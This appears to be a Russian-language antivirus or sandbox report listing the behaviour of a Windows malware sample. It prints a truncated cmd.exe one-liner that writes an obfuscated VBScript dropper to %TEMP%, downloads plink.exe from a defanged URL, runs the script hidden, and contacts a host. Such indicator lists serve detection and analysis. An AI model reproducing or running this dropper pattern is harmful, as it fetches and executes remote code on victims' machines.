Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO C2n= "http://th#.#arth.li/~sgtatham/putty/0.63/x86/plink.exe">>P3x.VBS &@ECHO Z7u = B7o("kgdifI`s`")>>P3x.VBS &@ECHO Set C8k = CreateObject(B7o("hnshgMIshgcook"))>>P3x.VBS ...
- %TEMP%\p3x.vbs
- %TEMP%\plink.exe
- %TEMP%\p3x.vbs
- http://th#.#arth.li/~sgtatham/putty/0.63/x86/plink.exe
- DNS ASK th#.#arth.li
- '<SYSTEM32>\wscript.exe' "%TEMP%\P3x.VBS"
- '%TEMP%\plink.exe'
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO C2n= "http://th#.#arth.li/~sgtatham/putty/0.63/x86/plink.exe">>P3x.VBS &@ECHO Z7u = B7o("kgdifI`s`")>>P3x.VBS &@ECHO Set C8k = CreateObject(B7o("hnshgMIshgcook"))>>P3x.VBS ...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13